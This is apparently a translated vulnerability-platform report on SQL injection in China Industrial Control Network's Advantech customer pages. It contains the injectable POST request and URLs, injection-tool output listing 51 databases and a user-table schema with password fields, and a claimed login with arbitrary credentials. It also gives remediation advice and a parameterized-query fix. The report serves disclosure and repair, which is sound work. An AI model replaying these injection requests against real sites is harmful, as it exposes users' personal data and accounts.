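2016-03-15: Details reported to the vendor; awaiting vendor handling
2016-03-18: Vendor confirmed; details disclosed to the vendor only
2016-03-28: Details disclosed to core white hats and experts in related fields
2016-04-07: Details disclosed to regular white hats
2016-04-17: Details disclosed to intern white hats
2016-05-02: Details disclosed to the public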
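China Industrial Control Network (中国工控网) is getting a lot of attention. This time I came at it from a different angle than earlier reporters, but it feels the same. Requesting the front page, requesting 20 rank.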
POST /customer/advantech/sq11.asp HTTP/1.1
Content-Length: 228
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCCBADTDC=HCILKDPCFHHGOOAMFMDHCEDN
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

psw=1&select=%b0%e5%bf%a8%c0%e0OEM/ODM%b7%fe%ce%f1&tijiao=%cc%e1%bd%bb&usname=aaaa*&xq=1
http://**.**.**.**/customer/advantech/embed.asp?key=SOM
http://**.**.**.**/customer/advantech/download.asp?keyword=%E5%B7%A5%E6%8E%A7%E6%9C%BA
available databases [51]:
[*] ABB
[*] agongkong
[*] ase_050124
[*] caa
[*] cfpmia
[*] cus_2010_for_bb
[*] cus_abb
[*] cus_abb_BC
[*] custom
[*] custom_1
[*] forzdao
[*] GkCrm
[*] gkmall
[*] gknetdatanew
[*] gkoa
[*] gkreguser
[*] gkstat
[*] GkStudy
[*] gkstudynet
[*] gksystem
[*] gongkong
[*] gongkongcorp
[*] GongKongNet
[*] inquire
[*] kpi2012
[*] LouKong
[*] master
[*] model
[*] msdb
[*] NBBS
[*] NDic
[*] NMessage
[*] NReguser
[*] NRegUserDynamic
[*] NSys
[*] NSysLog
[*] nweblog
[*] opc_2009
[*] peCms
[*] Photography
[*] ReportServer
[*] ReportServerTempDB
[*] SchneiderBBS
[*] siemensEl
[*] siemensQuiz
[*] tempdb
[*] wap2011
[*] wapsubscribe
[*] xiugongkong
[*] xuegongkong
[*] youjiang
Database: gongkongnet
Table: RegUserView
[72 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| active               | int      |
| actUserId            | char     |
| address              | nvarchar |
| answer               | nvarchar |
| biddingType          | char     |
| classday             | nvarchar |
| comCreatDate         | datetime |
| Comment              | varchar  |
| companyName          | nvarchar |
| companyUrl           | nvarchar |
| customSettings       | nvarchar |
| disableBizTrade      | char     |
| disableForum         | char     |
| distributeRate       | decimal  |
| email                | nvarchar |
| emailAlertTime       | datetime |
| fax                  | nvarchar |
| feedbacktrashnum     | int      |
| flag                 | char     |
| handset              | nvarchar |
| height               | nvarchar |
| id                   | char     |
| industryBound        | nvarchar |
| industryCode         | bigint   |
| interest             | nvarchar |
| interestCode         | bigint   |
| isAcceptSMS          | int      |
| IsAdded              | int      |
| isAddressValidation  | int      |
| isCardIdValidation   | int      |
| isemail              | int      |
| isEmailAlert         | char     |
| isExpert             | int      |
| isFaxValidation      | int      |
| isJoinMp             | int      |
| ismobile             | int      |
| isPhoneValidation    | int      |
| isTrueNameValidation | int      |
| isUsefulAddress      | char     |
| isUsefulEMail        | bit      |
| isUsefulPhone        | char     |
| isUsefulUserInfo     | char     |
| job                  | nvarchar |
| jobdgree             | nvarchar |
| joinFrom             | nvarchar |
| joinMPTime           | datetime |
| joinTime             | datetime |
| lastLogin            | datetime |
| lastTime             | datetime |
| loginName            | nvarchar |
| loginPoint           | int      |
| market               | nvarchar |
| oldcode              | int      |
| organization         | nvarchar |
| ownership            | nvarchar |
| panman               | nvarchar |
| password             | nvarchar |
| persons              | nvarchar |
| phone                | nvarchar |
| postalcode           | nvarchar |
| productTypeBound     | nvarchar |
| province             | nvarchar |
| question             | nvarchar |
| sex                  | char     |
| status               | char     |
| trueName             | nvarchar |
| turnover             | nvarchar |
| updateDate           | datetime |
| userType             | nvarchar |
| validLevel           | int      |
| vipRequest           | char     |
| workday              | nvarchar |
+----------------------+----------+
I tried a username and password at random, and the login succeeded.
Filter the parameters; deploy a WAF or a software firewall.
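Alongside the parameter filtering recommended above, the root cause is removed by binding request values as typed parameters instead of concatenating them into the SQL text. The following is an added example, not code from the original report or from the site: a classic ASP (VBScript) handler for a form field such as `usname`, using `ADODB.Command`. The table `dbo.DemoCustomer`, its columns and `Application("ConnStr")` are hypothetical placeholders; the same pattern applies to the `key` and `keyword` query-string parameters.

```asp
<%
Option Explicit
' Added example with hypothetical names: dbo.DemoCustomer, its columns and
' Application("ConnStr") are placeholders, not the site's real code or schema.

' ADO constants, declared here in case adovbs.inc is not included.
Const adCmdText    = 1
Const adParamInput = 1
Const adVarWChar   = 202

Const MAX_USNAME_LEN = 50

' Allow-list check: True only if the whole string matches the pattern.
Function Matches(value, pattern)
    Dim re
    Set re = New RegExp
    re.Pattern = pattern
    re.IgnoreCase = False
    re.Global = False
    Matches = re.Test(value)
End Function

' BEFORE (the injectable pattern): request data concatenated into the SQL text.
'   sql = "SELECT id FROM dbo.DemoCustomer WHERE usname = '" & _
'         Request.Form("usname") & "'"
'   Set rs = conn.Execute(sql)

' AFTER: validate first, then bind the value as a typed parameter so the
' database never parses it as SQL.
Dim usname, conn, cmd, rs
usname = Trim(Request.Form("usname") & "")

' Assumed allow-list (ASCII letters, digits and a few symbols); adjust it to
' the characters the field legitimately needs.
If Not Matches(usname, "^[A-Za-z0-9_.@-]{1," & MAX_USNAME_LEN & "}$") Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid input"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")   ' assumed: a low-privilege SQL login

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' "?" is a positional placeholder; the value travels separately from the SQL.
cmd.CommandText = "SELECT id FROM dbo.DemoCustomer WHERE usname = ?"
cmd.Parameters.Append cmd.CreateParameter("@usname", adVarWChar, adParamInput, MAX_USNAME_LEN, usname)

Set rs = cmd.Execute
If rs.EOF Then
    Response.Write "No match"
Else
    ' Encode on output so stored data cannot inject markup into the page.
    Response.Write "Found record " & Server.HTMLEncode(rs("id") & "")
End If

rs.Close
conn.Close
Set rs = Nothing
Set cmd = Nothing
Set conn = Nothing
%>
```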
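Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-03-18 18:22
CNVD did not directly reproduce the situation described. CNVD has notified the site's operator by e-mail through its publicly listed contact channel, and the operator is to provide a fix.
None yet.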